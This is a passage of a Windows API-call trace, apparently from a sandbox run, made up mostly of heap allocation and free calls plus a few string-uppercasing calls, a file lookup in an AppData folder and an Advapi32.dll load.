lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0122.580] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0122.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.588] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/fM4.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cce37f0, ftCreationTime.dwHighDateTime=0x1d5cb43, ftLastAccessTime.dwLowDateTime=0x503c5ad0, ftLastAccessTime.dwHighDateTime=0x1d5d235, ftLastWriteTime.dwLowDateTime=0x503c5ad0, ftLastWriteTime.dwHighDateTime=0x1d5d235, nFileSizeHigh=0x0, nFileSizeLow=0x7ba2, dwReserved0=0x0, dwReserved1=0x0, cFileName="fM4.mkv", cAlternateFileName="")) returned 0x9a4880 [0122.588] FindClose (in: hFindFile=0x9a4880 | out: hFindFile=0x9a4880) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0122.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.589] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0122.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0c0 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.590] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0122.590] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.590] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.591] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: 